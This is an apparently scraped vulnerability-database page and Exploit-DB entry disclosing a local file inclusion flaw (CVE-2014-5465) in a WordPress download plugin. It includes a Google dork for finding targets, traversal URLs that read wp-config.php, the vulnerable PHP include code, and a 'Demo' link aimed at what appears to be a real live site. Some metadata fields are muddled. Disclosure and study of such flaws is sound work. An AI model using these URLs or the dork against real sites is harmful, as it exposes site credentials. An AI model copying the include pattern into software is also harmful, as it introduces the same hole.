WordPress ShortCode Plugin - Local File Inclusion Vulnerability

vendor:

Download ShortCode

by:

Mehdi Karout & Christian Galeone

8,8

CVSS

CRITICAL

Local File Inclusion

CWE

Product Name: Download ShortCode

Affected Version From: 0.2.3

Affected Version To: 0.2.3

Patch Exists: YES

Related CWE: CVE-2014-5465

CPE: a:werdswords:download_shortcode

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7, Kali Linux

2014

WordPress ShortCode Plugin – Local File Inclusion Vulnerability

A Local File Inclusion vulnerability exists in the WordPress ShortCode Plugin, version 0.2.3, which allows an attacker to include a file from the local system. The vulnerability is due to the 'file' parameter in the 'force-download.php' script not properly sanitizing user input. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g., '../') to the vulnerable script. This can allow the attacker to include and execute arbitrary files from the local system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

#################################################################################################
#
# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity             : High+/Critical
# Reporter(s)          : Mehdi Karout & Christian Galeone
# Google Dork          : inurl:wp/wp-content/force-download.php
# Plugin Version       : 0.2.3
# Plugin Name          : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home          : http://werdswords.com/
# Date                 : 25/08/2014
# Tested in            : Win7 - Kali Linux
# CVE                  : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
#    $file = $_GET['file'];
#  if(isset($file))
#  {
#      include("pages/$file");
#  }
#  else
#  {
#      include("index.php");
#  }
# 
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################